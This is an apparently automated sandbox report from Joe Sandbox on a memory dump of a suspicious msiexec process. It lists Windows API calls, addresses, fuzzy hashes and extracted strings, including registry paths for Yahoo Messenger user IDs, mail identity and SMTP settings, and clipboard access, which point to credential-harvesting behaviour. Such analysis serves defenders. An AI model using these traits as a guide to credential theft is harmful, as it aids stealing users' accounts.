• Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: winRead
• API String ID: 1297977491-2759563040
• Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
• Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
• Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
• Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
APIs
• memset.MSVCRT ref: 0044955B
• memset.MSVCRT ref: 0044956B
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
• memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
• Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
• Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
• Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
• GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
• OpenClipboard.USER32(?), ref: 0040C1B1
• GetLastError.KERNEL32 ref: 0040C1CA
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
• String ID:
• API String ID: 1189762176-0
• Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
• Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• GetClientRect.USER32(00000000,?), ref: 004090DA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
• Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                APIs
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                APIs
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                • String ID: smtp
                                                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                • String ID: S_@$l
                                                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                Strings
                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                • API String ID: 714388716-917056472
                                                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                • String ID: 3CD
                                                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: rows deleted
                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
APIs
  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
• ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
• ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• memset.MSVCRT ref: 0040D2C2
• memset.MSVCRT ref: 0040D2D8
• memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
• memset.MSVCRT ref: 0040D319
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
• __allrem.LIBCMT ref: 00425850
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
• __allrem.LIBCMT ref: 00425933
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
APIs
Strings
• too many SQL variables, xrefs: 0042C6FD
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
• LocalFree.KERNEL32(?), ref: 004027A6
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT(?), ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
• _gmtime64.MSVCRT ref: 00411437
• memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
• strftime.MSVCRT ref: 00411476
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
• String ID:
• API String ID: 1886415126-0
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
APIs
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
• memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _strcmpi
• String ID: C@$mail.identity
• API String ID: 1439213657-721921413
                                                                                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValuememset
                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                • API String ID: 3363972335-1703613266
                                                                                                                                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                                                • String ID: Ul@
                                                                                                                                                • API String ID: 270934217-715280498
                                                                                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                Strings
                                                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                APIs
                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
